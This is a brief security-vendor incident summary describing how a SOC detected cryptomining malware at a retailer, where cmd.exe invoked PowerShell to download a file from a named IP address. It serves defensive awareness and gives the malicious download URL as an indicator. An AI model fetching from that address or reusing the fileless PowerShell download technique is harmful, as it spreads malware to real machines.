Cryptomining via PowerShell Caught at Retailer
The Netsurion EventTracker SOC reviews billions of logs daily to keep their customers safe from advanced threats. The EventTracker SOC (Security Operations Center) detected malware that bypassed the customer’s traditional Anti-Virus (AV) software. Cryptomining malware infects workstations and laptops to create armies of botnets that perform computational-intensive algorithms in the background of unsuspecting companies.
The analyst at the SOC used the advanced logic in EventTracker SIEM to detect a suspicious command with cmd.exe invoking PowerShell to download a suspicious file via http://220.127.116.11:80/a using Internet Explorer. PowerShell’s malicious use is often not detected or stopped by traditional endpoint defenses, as files and commands are not written to disk. Cryptomining impacts system performance, consume power, and can be the doorway to other nefarious activity like stealing credentials or sensitive data to monetize. Click below to read what happened.